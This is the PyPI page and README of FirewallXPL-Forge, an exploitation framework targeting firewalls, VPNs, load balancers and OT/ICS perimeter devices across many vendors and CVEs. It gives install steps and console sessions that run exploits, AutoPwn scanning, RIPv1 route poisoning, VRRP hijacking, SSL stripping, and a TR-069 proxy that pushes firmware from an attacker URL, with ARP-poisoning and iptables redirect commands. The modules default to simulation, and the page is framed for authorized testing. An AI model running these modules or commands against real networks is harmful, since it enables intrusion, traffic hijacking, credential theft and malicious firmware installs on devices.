Perimeter security exploitation framework — MERGED into EmbedXPL-Forge v2.0+. This is the final standalone release. See https://github.com/mrhenrike/EmbedXPL-Forge
Project description
FirewallXPL-Forge
⚠ MIGRATION NOTICE — v2.1.0 (Final Release)
FirewallXPL-Forge has been merged into EmbedXPL-Forge. All 81 unique modules (Fortinet, Cisco, Palo Alto, SonicWall, Sophos, Juniper, F5 BIG-IP, Citrix, Barracuda, A10, Imperva, NAC, pfSense, OT perimeter) are now available under
embedxpl/modules/exploits/firewalls/and related paths.To migrate:
pip install embedxpl # replaces firewallxpl exf # new CLI (fxf alias also available)FirewallXPL-Forge v2.1.0 is the final standalone release. This repository will remain archived for reference but will not receive new modules or CVE coverage.
Perimeter security exploitation framework — 164 modules covering FW, NGFW, UTM, WAF, VPN, NAC, LB, and OT/ICS industrial firewalls across 23 vendors and 51+ CVEs.
Author: André Henrique (@mrhenrike) | União Geek
Language: English (en-US) — default. Português (pt-BR): README.pt-BR.md
Architecture & Attack Surface Map
Install
# From PyPI (recommended)
pip install firewallxpl
# With Rich TUI + Nmap discovery
pip install firewallxpl[tui,discovery]
# With ML engine + GPU acceleration
pip install firewallxpl[ml,gpu-nvidia]
# Everything
pip install firewallxpl[full]
# From source
git clone https://github.com/mrhenrike/FirewallXPL-Forge.git
cd FirewallXPL-Forge
pip install -e ".[tui,discovery]"
python fxf.py
Environment diagnostics
python tools/env_doctor.py
What the project does
FirewallXPL-Forge provides modules for authorized security testing against perimeter devices (pentest, lab, controlled red team). Target classes: perimeter, waf, vpn, nac, lb.
| Type | Role |
|---|---|
| exploits | Abuse known vulnerabilities — check() + run() per module |
| creds | Default credentials and brute force against SSH, FTP, Telnet, HTTP, SNMP |
| scanners | Weakness identification; AutoPwn orchestrates all modules with Nmap-style timing (T0–T5) |
| payloads | Payload generation by architecture (ARM/MIPS/x86/x64, reverse/bind shells) |
| encoders | Payload encoding (Python, PHP, Perl) |
| generic | Cross-cutting utilities: CVE lookup, SNMP, SSDP, wordlist generator |
Out of scope: IP cameras, printers, DVRs, consumer routers.
Vendor coverage (23 vendors, 51+ CVEs)
IT Security Appliances
| Vendor | Modules | Key CVEs |
|---|---|---|
| Fortinet FortiOS/FortiGate | 9 | CVE-2018-13379, CVE-2022-40684, CVE-2024-21762, CVE-2024-47575 |
| Cisco ASA/FTD/IOS XE | 4 | CVE-2020-3452, CVE-2023-20198, CVE-2023-20269 |
| Palo Alto PAN-OS | 6 | CVE-2026-0257 (auth bypass CISA KEV 2026-05-29), CVE-2024-0012, CVE-2024-3400, CVE-2025-0108 |
| F5 BIG-IP | 6 | CVE-2020-5902, CVE-2022-1388, CVE-2023-46747 |
| Citrix/NetScaler | 3 | CVE-2019-19781, CVE-2023-3519, CVE-2023-4966 |
| SonicWall | 6 | CVE-2020-5135, CVE-2024-40766, CVE-2024-53704 |
| Ivanti/Pulse Secure | 3 | CVE-2019-11510, CVE-2023-46805+21887, CVE-2025-0282 |
| Juniper SRX/EX | 2 | CVE-2023-36845, CVE-2024-21591 |
| Sophos XG | 3 | CVE-2020-12271, CVE-2022-1040, CVE-2022-3236 |
| Check Point | 1 | CVE-2024-24919 |
| WatchGuard | 2 | XCS RCE, CVE-2022-23176 |
| Zyxel USG | 3 | CVE-2022-30525, CVE-2023-28771, CVE-2023-33009 |
| pfSense | 3 | CVE-2022-31814, CVE-2023-27100, CVE-2023-42326 |
| Barracuda | 3 | CVE-2023-2868, CVE-2023-7102, SecureSphere SQLi |
OT/ICS Industrial Firewalls
| Vendor | Modules | Key CVEs |
|---|---|---|
| Siemens SCALANCE/SINEMA/RUGGEDCOM | 3 | CVE-2022-32257, CVE-2023-24845, CVE-2023-44373 |
| Moxa EDR | 2 | CVE-2024-9137 (CVSS 9.9), CVE-2024-9138 |
| Hirschmann EAGLE | 1 | CVE-2020-6994 |
| Phoenix Contact mGuard | 1 | CVE-2024-43386 |
| Schneider ConneXium/Tofino | 1 | CVE-2017-6026 |
| Cisco ISA-3000 | 1 | CVE-2018-0101 (CVSS 10.0) |
| Secomea GateManager | 1 | CVE-2020-14500 (CVSS 10.0) |
| Ewon/HMS Cosy+ | 1 | CVE-2026-25823 |
OT Protocol Bypass
Modbus TCP, OPC UA, DNP3, IEC 60870-5-104, EtherNet/IP CIP
Generic Techniques
HTTP Request Smuggling, VLAN Hopping, Heartbleed, Shellshock, SSH Auth Keys
Usage
Interactive shell
python fxf.py
fxf > use exploits/perimeter/fortinet/fortios_sslvpn_path_traversal_cve_2018_13379
fxf (...) > set target 192.168.1.1
fxf (...) > check
[+] Target is vulnerable
fxf (...) > run
AutoPwn with ML
fxf > use scanners/autopwn
fxf (scanners/autopwn) > set target 192.168.1.1
fxf (scanners/autopwn) > set timing_template aggressive
fxf (scanners/autopwn) > set ml_advisor true
fxf (scanners/autopwn) > set ml_fingerprint true
fxf (scanners/autopwn) > run
Non-interactive mode
python fxf.py -m exploits/perimeter/fortinet/fortios_auth_bypass_cve_2022_40684 -s "target 10.0.0.1"
Search
fxf > search fortinet
fxf > search type=exploits vendor=cisco
fxf > search CVE-2024
fxf > search cve_2026_0257
NSE script installer
Install the bundled firewall-specific Nmap scripts into your nmap scripts directory:
# Interactive
fxf > install-nse
# Non-interactive (requires nmap in PATH)
python fxf.py -c "install-nse"
# Custom path or dry-run
python fxf.py -c "install-nse --path /usr/local/share/nmap/scripts"
python fxf.py -c "install-nse --check"
Bundled scripts:
| Script | Purpose |
|---|---|
fxf-firewall-fingerprint.nse |
Generic firewall fingerprinting (11 vendors) |
fxf-globalprotect-detect.nse |
Palo Alto GlobalProtect portal/gateway detection |
fxf-globalprotect-auth-bypass-cve-2026-0257.nse |
CVE-2026-0257 passive pre-check |
fxf-fortios-detect.nse |
Fortinet FortiOS detection |
fxf-cisco-asa-detect.nse |
Cisco ASA/FTD detection |
# After installing: use nmap directly
nmap -p 443 --script fxf-globalprotect-auth-bypass-cve-2026-0257 <target>
nmap -p 443,80,8443 --script fxf-firewall-fingerprint 192.168.0.0/24
See docs/wiki/en-US/12-nse-scripts.md for the full NSE reference.
Core engines
| Engine | Description |
|---|---|
| Async Concurrency | asyncio + ThreadPool (up to 300 threads) + ProcessPool + ConnectionPool + Pipeline |
| GPU Acceleration | NVIDIA CUDA, AMD ROCm, Intel oneAPI, Apple Metal, OpenCL, CPU fallback |
| ML Engine | ServiceFingerprinter, AttackOptimizer (Thompson Sampling), AnomalyDetector, AutoTuner, CredentialMutator |
| Network Discovery | Nmap/Masscan integration + builtin TCP fallback + device identification (23 vendors) + vulnerability mapping |
| Rich TUI | Styled banner, panels, tables, progress bars, full-screen dashboard |
Compatibility
| Platform | Status |
|---|---|
| Windows 10/11 | CI + local validation |
| WSL / Debian / Ubuntu | CI + local validation |
| Kali Linux | Validated locally |
| macOS | CI |
Python: 3.9 through 3.13. Includes shim for removed telnetlib on 3.13+.
Documentation
- Wiki (en-US + pt-BR): github.com/mrhenrike/FirewallXPL-Forge/wiki
- Coverage Matrix: docs/COVERAGE_MATRIX.md
- Full Catalog: docs/FULL_CATALOG.md
BLOCO J - Attack Categories (v2.0.0)
LEGAL WARNING: All modules in this section are for authorized security testing, research, and educational use only. Execution against production firewalls or routers without explicit written authorization is a federal crime. The authors and Uniao Geek assume no liability for misuse.
Routing Attacks
WARNING: Routing injection attacks redirect network traffic, may disrupt perimeter security and production services. Authorized lab use only.
fxf > use exploits/routing/rip_v1_poison
fxf (RIPv1Poison) > set src_ip 192.168.1.100
fxf (RIPv1Poison) > set poison_network 0.0.0.0
fxf (RIPv1Poison) > set metric 1
fxf (RIPv1Poison) > set destination 255.255.255.255
fxf (RIPv1Poison) > set simulate true
fxf (RIPv1Poison) > run
[SIMULATE] Would send RIPv1 Response to 255.255.255.255:520
[SIMULATE] Network: 0.0.0.0 (default route) metric=1 next-hop=192.168.1.100
[SIMULATE] Payload (24 bytes): 0201000000020000...
[SIMULATE] Exploits CVE-1999-0111: RIPv1 has no authentication
[SIMULATE] Effect: routers accepting unauthenticated RIPv1 install default route via attacker
[!] Set simulate false + destructive true to execute
fxf > use exploits/routing/vrrp_hijack
fxf (VRRPHijack) > set src_ip 192.168.1.100
fxf (VRRPHijack) > set vrid 1
fxf (VRRPHijack) > set virtual_ip 192.168.1.1
fxf (VRRPHijack) > set priority 255
fxf (VRRPHijack) > set simulate true
fxf (VRRPHijack) > run
[SIMULATE] Would send 5 VRRP Advertisement(s)
[SIMULATE] VRID=1 priority=255 virtual_ip=192.168.1.1 advert_int=1s
[SIMULATE] src=192.168.1.100 -> dst=224.0.0.18 (IP proto 112)
[SIMULATE] VRRP payload (16 bytes): 21012001...
[SIMULATE] Effect: current VRRP master yields; attacker becomes active router for 192.168.1.1
[!] PREREQ: Scapy + raw socket privileges (Linux root) or Windows admin
| Module | Path | Impact | Reference |
|---|---|---|---|
rip_v1_poison |
exploits/routing/ |
HIGH | CVE-1999-0111, RFC 1058 |
vrrp_hijack |
exploits/routing/ |
HIGH | RFC 3768, MITRE T1557 |
MiTM Proxies
WARNING: MiTM proxy modules intercept and potentially modify management traffic to network devices. May expose credentials and enable unauthorized configuration changes. Requires ARP poisoning as prerequisite.
fxf > use exploits/mitm/tr069_mitm_proxy
fxf (TR069MiTM) > set acs_host 10.0.0.1
fxf (TR069MiTM) > set acs_port 7547
fxf (TR069MiTM) > set listen_port 7547
fxf (TR069MiTM) > set inject_mode firmware
fxf (TR069MiTM) > set firmware_url http://attacker/malicious.bin
fxf (TR069MiTM) > set simulate true
fxf (TR069MiTM) > run
[SIMULATE] Would bind CWMP proxy on 0.0.0.0:7547
[SIMULATE] Upstream ACS: 10.0.0.1:7547 (ssl=False)
[SIMULATE] Injection mode: inject Download RPC pointing to http://attacker/malicious.bin
[SIMULATE] Setup required:
[SIMULATE] 1. ARP poison CPE to redirect port 7547 to attacker
[SIMULATE] 2. iptables -t nat -A PREROUTING -p tcp --dport 7547 -j REDIRECT --to-port 7547
[!] Set simulate false + destructive true to start proxy
fxf > use exploits/mitm/ssl_strip_embedded
fxf (SSLStrip) > set target 192.168.1.1
fxf (SSLStrip) > set target_port 443
fxf (SSLStrip) > set listen_port 10080
fxf (SSLStrip) > set simulate true
fxf (SSLStrip) > run
[SIMULATE] Would bind SSL strip proxy on 0.0.0.0:10080
[SIMULATE] Upstream target: 192.168.1.1:443 (use_ssl_upstream=True)
[SIMULATE] All HTTPS references stripped to HTTP in responses
[SIMULATE] Credentials, cookies, and auth headers logged in plaintext
[SIMULATE] Setup required:
[SIMULATE] 1. ARP poison target: arp -s <target_ip> <attacker_mac>
[SIMULATE] 2. iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10080
[!] Set simulate false + destructive true to start proxy
| Module | Path | Impact | Reference |
|---|---|---|---|
tr069_mitm_proxy |
exploits/mitm/ |
CRITICAL | TR-069 Amendment 6, CVE-2014-9222 |
ssl_strip_embedded |
exploits/mitm/ |
HIGH | BlackHat DC 2009 (Marlinspike), MITRE T1557.002 |
Coverage Summary
| Category | Modules | Default Mode |
|---|---|---|
| Routing Attacks | rip_v1_poison, vrrp_hijack |
simulate=True |
| MiTM Proxies | tr069_mitm_proxy, ssl_strip_embedded |
simulate=True |
| Perimeter Exploits | fortios_sslvpn_session_reuse, cisco_asa_ftd_firestarter_chain, + 10+ |
simulate=True |
| Credentials | perimeter_auth_bruteforce |
simulate=True |
All modules default to simulate=True. Live execution requires destructive=True set explicitly after reviewing the simulated output.
Governance
| English (default) | Português (pt-BR) |
|---|---|
| CONTRIBUTING.md | CONTRIBUTING.pt-BR.md |
| CODE_OF_CONDUCT.md | CODE_OF_CONDUCT.pt-BR.md |
| SECURITY.md | SECURITY.pt-BR.md |
| CONTRIBUTORS.md | CONTRIBUTORS.pt-BR.md |
License
BSD — see LICENSE.
Author: André Henrique (@mrhenrike) | União Geek — https://github.com/Uniao-Geek
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file firewallxpl-2.2.1.tar.gz.
File metadata
- Download URL: firewallxpl-2.2.1.tar.gz
- Upload date:
- Size: 1.4 MB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.14.4
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
417c29ccc147f5e176fdee6b8a252a8a4931507ff29ae8f4e5582fb8b3da2d06
|
|
| MD5 |
cb0114981cdd7a95134a1d075642797a
|
|
| BLAKE2b-256 |
1496b8cdd287571fecb271698f730acc6bee1a18fb158e6ff7ae4cd10929c93b
|
File details
Details for the file firewallxpl-2.2.1-py3-none-any.whl.
File metadata
- Download URL: firewallxpl-2.2.1-py3-none-any.whl
- Upload date:
- Size: 1.6 MB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.14.4
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
2b17fc806254518b76041d43b14a505d1da2787ec466abb3d7214f55386e3bd2
|
|
| MD5 |
0cf3b5be156e6f15d29414c407ee08f5
|
|
| BLAKE2b-256 |
a983d8e391fa45911e4aa84dc6bbaa8fd4dd7909e17029affe8d27cb5bf8f3e4
|